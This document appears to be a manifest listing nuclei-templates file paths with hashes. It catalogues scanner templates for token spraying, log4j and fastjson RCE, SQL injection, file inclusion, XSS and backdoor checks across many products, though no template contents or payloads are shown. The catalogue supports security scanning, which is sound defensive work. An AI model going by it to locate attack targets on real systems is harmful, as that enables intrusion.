+nuclei-templates/token-spray/google-geolocation.yaml:ae50d8fddc1a8e3fdac11bd4da4106eda5b855ef +nuclei-templates/token-spray/google-mapsembed.yaml:afdf3b373e027c1e98706d8d3b1ba89398e66144 +nuclei-templates/token-spray/google-mapsembedadvanced.yaml:d867cfaf52fdda581c561cf2e884ea70a0724ad2 +nuclei-templates/token-spray/google-nearbysearch.yaml:b168c023b8b742fba6ba6f98a4feabf12b253f2a +nuclei-templates/token-spray/google-nearestroads.yaml:399d9258e9ca928ee6fecb97b568813fd196556a +nuclei-templates/token-spray/google-placedetails.yaml:ffd7af8dbff9cf09de8efa2a62040530878ea90b +nuclei-templates/token-spray/google-placesphoto.yaml:480d17c18d16912a467d84526784d27fed27f1e4 +nuclei-templates/token-spray/google-playablelocations.yaml:e8be4c0bd6c8d578cc4440e4c925373853011aca +nuclei-templates/token-spray/google-routetotraveled.yaml:0cdee2e0ac602d3a5dcf693aeec086f0007e0491 +nuclei-templates/token-spray/google-safebrowsing.yaml:3a93b2ea0753b14c08042e8e4f3f7451082a0ec2 +nuclei-templates/token-spray/google-speedlimit.yaml:83df22835d1ad24f717ea10dbaa18001c6189e4b +nuclei-templates/token-spray/google-staticmaps.yaml:e0da376e7cad729c39657006d04d20cc5816185a +nuclei-templates/token-spray/google-streetview.yaml:bba78c0b9996448f379bead4ea0bfe6b341bc62a +nuclei-templates/token-spray/google-timezone.yaml:7f65c79d15c14d0602da7ff1fd10f2d5a3086fe7 +nuclei-templates/token-spray/googlet-extsearchplaces.yaml:f81874a4aaf6d82651faafd48b9cdbbc27a263b6 +nuclei-templates/vulnerabilities/apache/apache-flink-unauth-rce.yaml:f3948c37ae3f9a28fabbd79806272a2e63a0a118 +nuclei-templates/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml:f6c1698a93128283f96c0a0a21c6496b3096d88c +nuclei-templates/vulnerabilities/apache/apache-solr-file-read.yaml:871246420aeacdb04eea4c38eca7d6b152d9e066 +nuclei-templates/vulnerabilities/apache/apache-solr-log4j-rce.yaml:a1e9ca652eceb0975050aa9cfbdbd1e7691c22ed +nuclei-templates/vulnerabilities/apache/log4j/jamf-pro-log4j-rce.yaml:c37c11b5d98661ecede64dc658a8215678cb68dc +nuclei-templates/vulnerabilities/backdoor/jexboss-backdoor.yaml:a0124626d80ab14c59561c9afca1871072ea3832 +nuclei-templates/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml:7cf283a83b53c6a2b41a406f306df34fb36ae6d6 +nuclei-templates/vulnerabilities/cisco/cisco-vmanage-log4j.yaml:1a9dc423df8f72bd20040d23cbf3abfebe7a5e91 +nuclei-templates/vulnerabilities/cisco/cucm-username-enumeration.yaml:4c8febb4c6325ec8d18177af9a5c9105b19ef909 +nuclei-templates/vulnerabilities/code42/code42-log4j-rce.yaml:542bb54224a41f0a7e80d08ec87b82a1dbcb932a +nuclei-templates/vulnerabilities/concrete/concrete-xss.yaml:56519062f9adb4fd4f1ab277e0af9cd35ca1cdab +nuclei-templates/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml:ace9012fb0f45901b4eb2a91a5092215eab6ff41 +nuclei-templates/vulnerabilities/dedecms/dedecms-carbuyaction-fileinclude.yaml:eaa7136e03a8f83daabc71be4628e5e608a9795e +nuclei-templates/vulnerabilities/dedecms/dedecms-config-xss.yaml:e6021c2b0869d8047fee44805760899c172d9594 +nuclei-templates/vulnerabilities/dedecms/dedecms-membergroup-sqli.yaml:dffe896dcc208c05e64cb0e3faf6d9dae172c583 +nuclei-templates/vulnerabilities/dedecms/dedecms-openredirect.yaml:35b181cc663af981a64335f83ff307f745af9071 +nuclei-templates/vulnerabilities/dedecms/dedecms-rce.yaml:93e70d70153253449eaf28c251e920fa935ef184 +nuclei-templates/vulnerabilities/drupal/drupal-avatar-xss.yaml:a70fe4fdb42f345670c90299096f6f2987f34c40 +nuclei-templates/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml:9e6e70fc7b6da1008de34b191ad7870b20fc0664 +nuclei-templates/vulnerabilities/fastjson/fastjson-1-2-41-rce.yaml:7a52fe67bef98458c7412a24baf7e7fa56d70bf3 +nuclei-templates/vulnerabilities/fastjson/fastjson-1-2-42-rce.yaml:c2cf9d94a3e732ca50b7261e59b4b09fcca2676d +nuclei-templates/vulnerabilities/fastjson/fastjson-1-2-43-rce.yaml:d79859ea1ef86e8cb6ecf74ab00028edc0fc3adc +nuclei-templates/vulnerabilities/fastjson/fastjson-1-2-47-rce.yaml:68d32926e66d68e96c5d32d7769cd82180c8fe94 +nuclei-templates/vulnerabilities/fastjson/fastjson-1-2-62-rce.yaml:b6ce45dd017aaa56cea2d5bd20d8ed7693c1da26 +nuclei-templates/vulnerabilities/fastjson/fastjson-1-2-67-rce.yaml:f9d4ecb08bdf51e74c5d27998b1734e91bb165a9 +nuclei-templates/vulnerabilities/fastjson/fastjson-1-2-68-rce.yaml:888c405ab50727cd739bc54a4f636b68f3e8a539 +nuclei-templates/vulnerabilities/generic/basic-xss-prober.yaml:89b909d447b5c3021286127387981c7e82866d8d +nuclei-templates/vulnerabilities/generic/cache-poisoning.yaml:5cb427ca65a95703bda5207950c347903438dc47 +nuclei-templates/vulnerabilities/generic/cors-misconfig.yaml:bc288ef75e3700ff443c3332daedaa7c388b1214 +nuclei-templates/vulnerabilities/generic/crlf-injection.yaml:cbd5722d86198c3ddaf9cc7452916dc573f79624 +nuclei-templates/vulnerabilities/generic/error-based-sql-injection.yaml:ffdfa2ddcaa8c2aec8016d66793c53283e851790 +nuclei-templates/vulnerabilities/generic/generic-blind-xxe.yaml:416a498bea851b8f674ce650335ba818df9c5f78 +nuclei-templates/vulnerabilities/generic/generic-j2ee-lfi.yaml:579eb0f5663f369792bfe80c1f2bfd8102e362c1 +nuclei-templates/vulnerabilities/generic/generic-linux-lfi.yaml:48fe258a069af24d8d7d0c51d07049655cac1473 +nuclei-templates/vulnerabilities/generic/generic-windows-lfi.yaml:c5dd56fb49ad972226343b626df06887fb2b8e5a +nuclei-templates/vulnerabilities/generic/host-header-injection.yaml:192b90b475a64004c04193e1c1bdf59dd1a2b787 +nuclei-templates/vulnerabilities/generic/oob-header-based-interaction.yaml:4e47ac12b1fc6519185e33bd4dd21befa6edb1c8 +nuclei-templates/vulnerabilities/generic/oob-param-based-interaction.yaml:39c0ea563d4c9e186c5b819fa036c1cdf5283140 +nuclei-templates/vulnerabilities/generic/open-redirect.yaml:9da64634d7a27abe61f2238f2c1a927853c5fa0e +nuclei-templates/vulnerabilities/generic/request-based-interaction.yaml:247c3757770ee947271e71e7b252a6385b7f6828 +nuclei-templates/vulnerabilities/generic/top-xss-params.yaml:44bdf462e56ed348589afd929f99dbe5d3eb5249 +nuclei-templates/vulnerabilities/generic/xmlrpc-pingback-ssrf.yaml:30500974e9cafd36f348a2e21eb5bf5e223e336b +nuclei-templates/vulnerabilities/gitlab/gitlab-rce.yaml:49d8676ccc3ef0193c8302f0ed746ec3eadb696a +nuclei-templates/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml:a830214a4d3cbe8c5ef4d364325460f98c6b2f3e +nuclei-templates/vulnerabilities/gnuboard/gnuboard5-rxss.yaml:a67da02d5c32e88c92645727e7cf33412aef4829 +nuclei-templates/vulnerabilities/gnuboard/gnuboard5-xss.yaml:f390e012983ffd508407d04b998eee9b94708df2 +nuclei-templates/vulnerabilities/grafana/grafana-file-read.yaml:0341b4b2e7258e425987b29619f93550913e1946 +nuclei-templates/vulnerabilities/httpbin/httpbin-open-redirect.yaml:683460135fa0018a60aa40e73955599e82ca048e +nuclei-templates/vulnerabilities/httpbin/httpbin-xss.yaml:012e82d62dd08eb06ff1772b2824ee019dca28f1 +nuclei-templates/vulnerabilities/huawei/huawei-hg255s-lfi.yaml:829519658dc39097d80f8fcc57acc3b21f303673 +nuclei-templates/vulnerabilities/ibm/eclipse-help-system-xss.yaml:57bc74e33ef257399f462978289bcd98e0b56749 +nuclei-templates/vulnerabilities/ibm/ibm-infoprint-lfi.yaml:9e0afe62485039b5ac9bc1e7d1c51230da9198ca +nuclei-templates/vulnerabilities/j2ee/liferay-resource-leak.yaml:f11e27d6b825b44a50cef64ca3a40766ed0f12e2 +nuclei-templates/vulnerabilities/jamf/jamf-blind-xxe.yaml:d190b0e860b39857f6bdcac35ebe50cbe5fad9e1 +nuclei-templates/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml:7a8fa8e6d6710574103e3f1ea2b039c79a6ca3e0 +nuclei-templates/vulnerabilities/jenkins/jenkins-asyncpeople.yaml:588c9156a6c493c9221cd02c7f52607c79606c59 +nuclei-templates/vulnerabilities/jenkins/jenkins-script.yaml:921a1ced3e4f5fc83c3d220e28bbb1c088076f29 +nuclei-templates/vulnerabilities/jenkins/jenkins-stack-trace.yaml:8ff8f4b27efbbf2eb645c16d4223d4b3189c3331 +nuclei-templates/vulnerabilities/jenkins/unauthenticated-jenkins.yaml:616191a8f064a34ee850e2aa2e74ff0417f3b2a9 +nuclei-templates/vulnerabilities/jira/jira-servicedesk-signup.yaml:af7b137ace24ead9812cb50cd3ee6475cd89931f +nuclei-templates/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml:ad148167ee3ccd0e5890c4710643d14ecc3ddffc +nuclei-templates/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml:95e841cce580772467d533898677b1a1682ba915 +nuclei-templates/vulnerabilities/jira/jira-unauthenticated-installed-gadgets.yaml:d24018f982038ad8c019e12fa5a6a17ff76743cb +nuclei-templates/vulnerabilities/jira/jira-unauthenticated-projectcategories.yaml:ce9fec80ab418fe2fe41fa5dbd039cae2e49b09e +nuclei-templates/vulnerabilities/jira/jira-unauthenticated-projects.yaml:19c3ff9b0e18f6ad96959ad41e30d15c8802eae4 +nuclei-templates/vulnerabilities/jira/jira-unauthenticated-resolutions.yaml:4eb7aa8c9a680caab349b01ba3ae1bbfb0d2c9ea +nuclei-templates/vulnerabilities/jira/jira-unauthenticated-screens.yaml:ce02f5a23de9e8d2680837abbcac8a7c9f1d7c00 +nuclei-templates/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml:071483f15f0e2450d192d03d1c6bdb69bb5342a3 +nuclei-templates/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml:f8e7c402227b03d928fd74d9dd29ba32f0c0ffbf +nuclei-templates/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml:0b92866222a824e6e6d98c4339423313470bc487 +nuclei-templates/vulnerabilities/joomla/rusty-joomla.yaml:661f862f9d7280655228dea4c4a3ddd6036503da +nuclei-templates/vulnerabilities/laravel/laravel-ignition-xss.yaml:95e7bf95da7b09367ae77ef6dac4a207ee00b1ef +nuclei-templates/vulnerabilities/linkerd/linkerd-ssrf.yaml:f50907f279fffa27b9a2439803da045ed9e8a79a +nuclei-templates/vulnerabilities/magento/magento-2-exposed-api.yaml:1525d112456d5cc502a33ffea264a5dac5815c61 +nuclei-templates/vulnerabilities/magento/magento-cacheleak.yaml:57e012396389bf2e0c1cd3abd0d8da2a4a84ba6f +nuclei-templates/vulnerabilities/magento/magento-unprotected-dev-files.yaml:3b437d3c529be40e30d0b21e168ba00931e3154b +nuclei-templates/vulnerabilities/metersphere/metersphere-plugin-rce.yaml:83f39b17e75b9239b4e2808b5393291dbf3bdcdf +nuclei-templates/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml:b7c9eb38720b761563edf5959f13253c2ea8436c +nuclei-templates/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml:fb1d5a7099b51e939e5614f1d9a0474472591cc0 +nuclei-templates/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml:2c2e01ea1ca2e5f601454589fa0a571a19913a83 +nuclei-templates/vulnerabilities/moodle/moodle-xss.yaml:9bc4c0594b43b76c3ad7d030048d7ed06edcadd3 +nuclei-templates/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml:cfabde542fa76d958e6884a7b4177fe0f0df0ae9 +nuclei-templates/vulnerabilities/netsweeper/netsweeper-rxss.yaml:ffabf11ac60107b3db318f97d99fde0a2ec91a5b +nuclei-templates/vulnerabilities/opencpu/opencpu-rce.yaml:e2e90207d30196257b3732045ec356aca5348f5f +nuclei-templates/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml:cea8c9efeffe87f5dd9956e6659aa8476f01d73f +nuclei-templates/vulnerabilities/oracle/oracle-ebs-xss.yaml:108b2973ce8f9f406b3f60b2c2e4585fc7a8483e +nuclei-templates/vulnerabilities/oracle/oracle-siebel-xss.yaml:aaed247f640feddbabda293fa13c51341160998c +nuclei-templates/vulnerabilities/oscommerce/oscommerce-rce.yaml:c5347bb38a695b50a01e1b3972cc573fe92d16a1 +nuclei-templates/vulnerabilities/other/3cx-management-console.yaml:0c764d8b742c6e782278c0ae4867feb776b9c4ae +nuclei-templates/vulnerabilities/other/74cms-sqli.yaml:b9ec3f24a7c5e71fd398197aceae32cde04a4502 +nuclei-templates/vulnerabilities/other/WSO2-2019-0598.yaml:a29827c5e9105deace3cbe4ec4da000ac59104e7 +nuclei-templates/vulnerabilities/other/accent-microcomputers-lfi.yaml:3ab8709dffed193d0accde3dac37579b7d5c04f1 +nuclei-templates/vulnerabilities/other/acme-xss.yaml:237bcb7db65e6de3c13804da273add213968d63d +nuclei-templates/vulnerabilities/other/aerocms-sqli.yaml:97aeb21b84c5826ca9f1a5d3132552212772e760 +nuclei-templates/vulnerabilities/other/alumni-management-sqli.yaml:1fa4947914f875b72920e91a85fdb36a0c6ec59c +nuclei-templates/vulnerabilities/other/antsword-backdoor.yaml:0795b95232c156b3dc2434402e82971df2a2ddb4 +nuclei-templates/vulnerabilities/other/asanhamayesh-lfi.yaml:9cdaa18bc958a89e66f75871049e9e5e9548d0df +nuclei-templates/vulnerabilities/other/aspnuke-openredirect.yaml:e4a814451d265027fb4fd2f8e0379c0d50effcfa +nuclei-templates/vulnerabilities/other/avada-xss.yaml:deddf02c18d2bdc235eece9aea922e4594e21163 +nuclei-templates/vulnerabilities/other/bems-api-lfi.yaml:afd1bdf911ff471abd8e15e3e453301882174c2a +nuclei-templates/vulnerabilities/other/beward-ipcamera-disclosure.yaml:27750b5b06c8639c6b0e388e79a7111f41bcdd36 +nuclei-templates/vulnerabilities/other/bitrix-open-redirect.yaml:a71d5ebbf83ae9f02fda635c80141fe0a869b2d0 +nuclei-templates/vulnerabilities/other/blue-ocean-excellence-lfi.yaml:b52cc918b9bd6f652f79219e017936fc8e5514d9 +nuclei-templates/vulnerabilities/other/bullwark-momentum-lfi.yaml:ea39c6f794cebc8c3a33b77e0417ca087a736565 +nuclei-templates/vulnerabilities/other/cacti-weathermap-file-write.yaml:b9199113fc2033314f426754bda33c6357341cca +nuclei-templates/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml:e974710212653bb786a0ce639b3161dd18727d4f +nuclei-templates/vulnerabilities/other/carrental-xss.yaml:2e143c50d90fba00a80db2d0361c5b4d7eab2931 +nuclei-templates/vulnerabilities/other/caucho-resin-info-disclosure.yaml:ecd047d2e20b8373e53e1ecf4a6303b1095b2389 +nuclei-templates/vulnerabilities/other/chamilo-lms-sqli.yaml:8f9969c26444250ebfbd47388a2ec56203ad73c5 +nuclei-templates/vulnerabilities/other/chamilo-lms-xss.yaml:fe21d69ef5c7c4029f1b92357574f091d102792e +nuclei-templates/vulnerabilities/other/ckan-dom-based-xss.yaml:d1be4381b774c07342991536db1ddfc0c74960d3 +nuclei-templates/vulnerabilities/other/clockwatch-enterprise-rce.yaml:458a4f53d6b70f45f2699abae9f540b87e78ce5c +nuclei-templates/vulnerabilities/other/coldfusion-debug-xss.yaml:db68585aafc0f7a58a5ff5d55c20343a99edf5b4 +nuclei-templates/vulnerabilities/other/commax-biometric-auth-bypass.yaml:43cadcfd701383834185558a4a59d53f140744f5 +nuclei-templates/vulnerabilities/other/commax-credentials-disclosure.yaml:d0c7bbd47537151c9768955eee42bd3acd4a99a6 +nuclei-templates/vulnerabilities/other/comtrend-password-exposure.yaml:b2be511bd05c99b3ff212ae3012b8e70b90d4a41 +nuclei-templates/vulnerabilities/other/core-chuangtian-cloud-rce.yaml:471e07eaac7f50b1bf0f3734d0974dfed06776de +nuclei-templates/vulnerabilities/other/couchdb-adminparty.yaml:d330201b2aa01a4e5c9d9a3aff602c63033b048a +nuclei-templates/vulnerabilities/other/crystal-live-server-lfi.yaml:435295fa74e899c34fcf58c0532f00a510c7a29c +nuclei-templates/vulnerabilities/other/cs-cart-unauthenticated-lfi.yaml:092b4217b2d78bbea050d15d568e83be692b4af5 +nuclei-templates/vulnerabilities/other/cvms-sqli.yaml:a2663143c1bef1f466cf9ceb54226376d41a9220 +nuclei-templates/vulnerabilities/other/dicoogle-pacs-lfi.yaml:9d0544d11cef44411f86c220d52e40d45a653531 +nuclei-templates/vulnerabilities/other/digitalrebar-traversal.yaml:9ca0fdf9f33d1be06955a47bbf7461abf0c0f303 +nuclei-templates/vulnerabilities/other/discourse-xss.yaml:bf26a43f315c084d92f2d4751fbeed281f716833 +nuclei-templates/vulnerabilities/other/dixell-xweb500-filewrite.yaml:0ec4f37820b1d0ed69efa17e5a66580cba2aa1c0 +nuclei-templates/vulnerabilities/other/dlink-850L-info-leak.yaml:17462f14ba12822a8b1dbd67b64d78392534ef0a +nuclei-templates/vulnerabilities/other/dotnetcms-sqli.yaml:8ba6d801f64588754fe3443d4643870daeec9683 +nuclei-templates/vulnerabilities/other/dss-download-fileread.yaml:2d77ee066e4848d971b7be3940f704cfb599b999 +nuclei-templates/vulnerabilities/other/duomicms-sql-injection.yaml:0349b6215e60a9c26cb89154d4c616b4d7c78251 +nuclei-templates/vulnerabilities/other/dzzoffice-xss.yaml:84ab70d77d83830121f506693e0a5c886b68b007 +nuclei-templates/vulnerabilities/other/ecshop-sqli.yaml:62c17172d93f5607c905d93e83d8752217c39f45 +nuclei-templates/vulnerabilities/other/ecsimagingpacs-rce.yaml:b6a8c3babe4153cd2135b7388ed4cad0926a034d +nuclei-templates/vulnerabilities/other/eibiz-lfi.yaml:499d239140a9033fbf216eb834bb1cfe55af9a53 +nuclei-templates/vulnerabilities/other/elFinder-path-traversal.yaml:82c0c5166bc0b8a1e961d5c15c8e61a5322fd4ad +nuclei-templates/vulnerabilities/other/elasticsearch5-log4j-rce.yaml:164bd728dba1e6d9d4e607d59c5015e62ff558c9 +nuclei-templates/vulnerabilities/other/empirecms-xss.yaml:d61af0a4a823ec81dc5b291cc1bb02e794b46ae9 +nuclei-templates/vulnerabilities/other/ems-sqli.yaml:81e3263aee8393bcb363079c526d490efd71c3f9 +nuclei-templates/vulnerabilities/other/eris-xss.yaml:875b0b602417409ea4f78d9a08d3810b2533d372 +nuclei-templates/vulnerabilities/other/etouch-v2-sqli.yaml:1abaf5a1235d4a34fcc649b531e767a68faa5180 +nuclei-templates/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml:a61c78ccf54d1e6e21473ae76f113d06dd06e77c +nuclei-templates/vulnerabilities/other/eyelock-nano-lfd.yaml:c4a3364eba46893b518166174d580bd11634c1f6 +nuclei-templates/vulnerabilities/other/fanruanoa2012-disclosure.yaml:b42d5a8c33dea7f0fa26e6b0d44d2299b0c234b4 +nuclei-templates/vulnerabilities/other/fatpipe-auth-bypass.yaml:4fc33c73a1e749eba8774f637c5186c0ce8f0e73 +nuclei-templates/vulnerabilities/other/fatpipe-backdoor.yaml:28e0f849b3f9ad7a97f23b40d18e68a19c93baf7 +nuclei-templates/vulnerabilities/other/feifeicms-lfr.yaml:6b764167b15e7d493c58c173e30b7f7138b3596e +nuclei-templates/vulnerabilities/other/finecms-sqli.yaml:069860786dab6075d8dc203c0e7eb12a639d69b5 +nuclei-templates/vulnerabilities/other/finereport-path-traversal.yaml:91730ef403928d3b5aa0e041a4edf2a6d2174982 +nuclei-templates/vulnerabilities/other/flatpress-xss.yaml:d3b2572f8b770d5825970c87a95e5ec2c8870e58 +nuclei-templates/vulnerabilities/other/flir-path-traversal.yaml:242081c1b359c5b4dced71f36876c8f70a9546c2 +nuclei-templates/vulnerabilities/other/geovision-geowebserver-lfi.yaml:82c04eba34d9d0ec19a015061ff814c6a8e2461e +nuclei-templates/vulnerabilities/other/geovision-geowebserver-xss.yaml:b97ba7886fb395f4d9b000d4db56f2becce63232 +nuclei-templates/vulnerabilities/other/global-domains-lfi.yaml:2b3127a42a5c006136dcbb0e390603eadf1bc82f +nuclei-templates/vulnerabilities/other/global-domains-xss.yaml:0d809da954f4c40495d473a8960fbccb0634043d +nuclei-templates/vulnerabilities/other/gloo-unauth.yaml:2b26ba0edfc0a193c82ef02bd3618cab5de4c7a8 +nuclei-templates/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml:458fbefb84c648c395eddbe3cc406b44112b54cd +nuclei-templates/vulnerabilities/other/goip-1-lfi.yaml:fd5ee573231bb1f82d6a8d902e9febb5be31f7be +nuclei-templates/vulnerabilities/other/graylog-log4j.yaml:b567d347da76d4630a2578b41668896604b63fdf +nuclei-templates/vulnerabilities/other/groupoffice-lfi.yaml:c0bd20478c851524499d85ed489fa56f3af092f1 +nuclei-templates/vulnerabilities/other/gsoap-lfi.yaml:86f4e262391542c67a51c7b26d61a3bf190fc54f +nuclei-templates/vulnerabilities/other/h3c-imc-rce.yaml:d50fe2b89fff280c810c5b679b31b0dbf3354f09 +nuclei-templates/vulnerabilities/other/hanming-lfr.yaml:d56875657539a413de3139a4871f4c98cc7f620d +nuclei-templates/vulnerabilities/other/hashicorp-consul-rce.yaml:c762ebdea9a0a2c415bd4e13e038c575c46f3877 +nuclei-templates/vulnerabilities/other/hasura-graphql-psql-exec.yaml:d9ac4198446e6b1f66ff45d8e42ba9d31c1d9543 +nuclei-templates/vulnerabilities/other/hasura-graphql-ssrf.yaml:d3c9be0da04c38cd26647564e36cfe5162f5cd4a +nuclei-templates/vulnerabilities/other/hiboss-rce.yaml:36758e332f1a7db084aeed73ad19e724d37086cb +nuclei-templates/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml:1fc40fa36fad468a24bdcb18a0500c41691d088a +nuclei-templates/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml:3ac740c738100956969e0cea7a87ef1be0916196 +nuclei-templates/vulnerabilities/other/homeautomation-v3-openredirect.yaml:5af0fd9f0e914bdc7b02dc4ca7dafdc0a756889b +nuclei-templates/vulnerabilities/other/hospital-management-xss.yaml:9e79863b5626698b64231ace651f129030ff3cc8 +nuclei-templates/vulnerabilities/other/hospital-management-xss2.yaml:48cdf3b1044f8bcbe01f320d62294e61768e8cbe +nuclei-templates/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml:22d0df9ae1adbeaafc3cbcc9eee6539c658054b4 +nuclei-templates/vulnerabilities/other/huawei-hg659-lfi.yaml:35ae4362e3588366ac1208b28bd441cdf033968a +nuclei-templates/vulnerabilities/other/huawei-router-auth-bypass.yaml:88893cb214888b06bbcbf538477c02ba5830ec7c +nuclei-templates/vulnerabilities/other/huijietong-cloud-fileread.yaml:6e8e8420719019ed016eb5a11822f209310eff1c +nuclei-templates/vulnerabilities/other/icewarp-open-redirect.yaml:4203247e56d18999083fcd2065cefe2b8d03ecfd +nuclei-templates/vulnerabilities/other/icewarp-webclient-rce.yaml:05bf0608e462e5f3f93afd4c09bac785e88dd291 +nuclei-templates/vulnerabilities/other/inspur-clusterengine-rce.yaml:bc782aef9970d907574741e89c8557b87746c6ad +nuclei-templates/vulnerabilities/other/interlib-fileread.yaml:928ae3146564a65a2c7f13bc7aa64d1ab0cc7210 +nuclei-templates/vulnerabilities/other/java-melody-xss.yaml:dc57e50d838712a9a6b73a415feeebf4b9d6e4a0 +nuclei-templates/vulnerabilities/other/jeewms-lfi.yaml:7dd3a28ae25c80738d4c122b87d1c05390f72efb +nuclei-templates/vulnerabilities/other/jfrog-unauth-build-exposed.yaml:2610956b90ab60509b474fc461cfe95d04359703 +nuclei-templates/vulnerabilities/other/jinfornet-jreport-lfi.yaml:38912a83c42d119faf87ba7e5d38ac7ad2e8d063 +nuclei-templates/vulnerabilities/other/joomla-com-fabrik-lfi.yaml:88d390dd8377c434d1d72114c4b43494b740b4ed +nuclei-templates/vulnerabilities/other/kafdrop-xss.yaml:522f754ecc39c005e61c5129bc5560eb7b8ebcee +nuclei-templates/vulnerabilities/other/karel-ip-phone-lfi.yaml:a3a0aa1b125e4991ced2887085f7eb8e860f07de +nuclei-templates/vulnerabilities/other/kavita-lfi.yaml:ff66e5863500256cff51434dcdd6e8343c978df9 +nuclei-templates/vulnerabilities/other/kevinlab-bems-backdoor.yaml:0ae11ee48e2d7d232a08ac6643407c076f02bd32 +nuclei-templates/vulnerabilities/other/kevinlab-bems-sqli.yaml:07561683372ad8c8d95409f0ba24df07fbe58c50 +nuclei-templates/vulnerabilities/other/kevinlab-hems-backdoor.yaml:fa71fd5e27f882261b13344f0ac991c4edf50abf +nuclei-templates/vulnerabilities/other/keycloak-xss.yaml:e2333fa6d2193d8e55e6391f0f775ae141451f4c +nuclei-templates/vulnerabilities/other/kingdee-eas-directory-traversal.yaml:d445050e29fe39b54c61cb68ba18c31949e4f71f +nuclei-templates/vulnerabilities/other/kingsoft-v8-file-read.yaml:f2e266de77c788697687b4748c06ea8e14f6479f +nuclei-templates/vulnerabilities/other/kiwitcms-json-rpc.yaml:f5e2735d928359c6ad410685de9d9821b817b966 +nuclei-templates/vulnerabilities/other/kyocera-m2035dn-lfi.yaml:359be4186abe80ff54b036bff61fc9325cfbaa75 +nuclei-templates/vulnerabilities/other/laravel-filemanager-lfi.yaml:7d3277530b19f829d5d926e5fc9e87eeb421d8c5 +nuclei-templates/vulnerabilities/other/loancms-sqli.yaml:6ef29afa04efa686f24c4f35e9c0d59bce0054d5 +nuclei-templates/vulnerabilities/other/lotuscms-rce.yaml:b082c27463c8bd87a041ad36fad0e2eb0bef588e +nuclei-templates/vulnerabilities/other/lucee-xss.yaml:80420f755268669036d8d9338ea2519e327d89fd +nuclei-templates/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml:d66a7a89eca106adedc95bb3b6357203c2c6020c +nuclei-templates/vulnerabilities/other/maccmsv10-backdoor.yaml:1d2d6466d4b031034c9eca8a6c065a1e2d6c605a +nuclei-templates/vulnerabilities/other/magicflow-lfi.yaml:6c8ee6cb9c06cc8580b1136320ba3a25b5039bca +nuclei-templates/vulnerabilities/other/mcafee-epo-rce.yaml:af0636662fb5b1dbafb3d8a37fb2fff0fe171a0c +nuclei-templates/vulnerabilities/other/metabase-log4j.yaml:a84ffe4e53226b3c3a76b382d0acc063320e4a46 +nuclei-templates/vulnerabilities/other/metinfo-lfi.yaml:ca438bfdde0957099dfeb6393cc1e43021ef1ad5 +nuclei-templates/vulnerabilities/other/microstrategy-ssrf.yaml:d3532588256124ebb4fd00efd0fa0b540b27182f +nuclei-templates/vulnerabilities/other/microweber-xss.yaml:77d216fbe191db00f877fb330d47803140a86ad1 +nuclei-templates/vulnerabilities/other/mida-eframework-xss.yaml:7269939a8b71cf64cd4757b2e40f3a82c623a8fa +nuclei-templates/vulnerabilities/other/minimouse-lfi.yaml:60e31fe128a71e4971515b3f4309d4b16c885528 +nuclei-templates/vulnerabilities/other/mirai-unknown-rce.yaml:ac9d5494718da27561d52d1a495aa0ae2d8dbe64 +nuclei-templates/vulnerabilities/other/mpsec-lfi.yaml:badc338b56cad328026adf0430795591abe60e6d +nuclei-templates/vulnerabilities/other/ms-exchange-server-reflected-xss.yaml:fb5c79d6ebcb7c08c00a77ee74c12380c03b56e5 +nuclei-templates/vulnerabilities/other/myucms-lfr.yaml:1782ef06d1065c4fa0669bf8b155c6f2b6113d56 +nuclei-templates/vulnerabilities/other/natshell-path-traversal.yaml:4e01368a47e94c42f895d797c266864c73d4be55 +nuclei-templates/vulnerabilities/other/natshell-rce.yaml:45585a61a84a513024a0a424311192f8f5af841c +nuclei-templates/vulnerabilities/other/netgear-router-auth-bypass.yaml:49fd20c855a49d9ad62760ac65b295737482ef7f +nuclei-templates/vulnerabilities/other/netgear-router-exposure.yaml:bb4de1f899c5f5fe975991f2870d946f54156abb +nuclei-templates/vulnerabilities/other/netgear-wac124-router-auth-bypass.yaml:6b5e7bbaf0130ce1f1eecb755839b4f1d52039fb +nuclei-templates/vulnerabilities/other/netis-info-leak.yaml:d271dd7bdae2b8f5cc2fc254d175ded162d48079 +nuclei-templates/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml:26d0c6649ce997c57042c3512af26f3ea6c6f208 +nuclei-templates/vulnerabilities/other/nginx-module-vts-xss.yaml:dc4471b1adba326c7fe460c0c4b79f5064acbbf5 +nuclei-templates/vulnerabilities/other/ns-asg-file-read.yaml:f5bcafe8685fafcbfbcf38c036aa7c1d4c7a45d8 +nuclei-templates/vulnerabilities/other/nuuo-file-inclusion.yaml:a2e50d0bb29090aa752bd42cb33ac123317557eb +nuclei-templates/vulnerabilities/other/nuuo-nvrmini2-rce.yaml:1be707e524e53f401ac6bbc318b952d8cf3029d7 +nuclei-templates/vulnerabilities/other/odoo-cms-redirect.yaml:8c90eb602d27385498c7fb30ba2fe43079ab9785 +nuclei-templates/vulnerabilities/other/oliver-library-lfi.yaml:10eb1b9de41f0bbd22ea7f40e2352ec7431277bb +nuclei-templates/vulnerabilities/other/onlinefarm-management-xss.yaml:541a3c1357b288d31f33743af70406b3e62f3c99 +nuclei-templates/vulnerabilities/other/opencti-lfi.yaml:b552f6e61167f41afa75ec4a41b164303ed79143 +nuclei-templates/vulnerabilities/other/opennms-log4j-jndi-rce.yaml:16a2850f84ea19a6329289ff0b2014faea257ff9 +nuclei-templates/vulnerabilities/other/opensis-lfi.yaml:687c468404ed243a3f63c4e2686d96fe79dff2a2 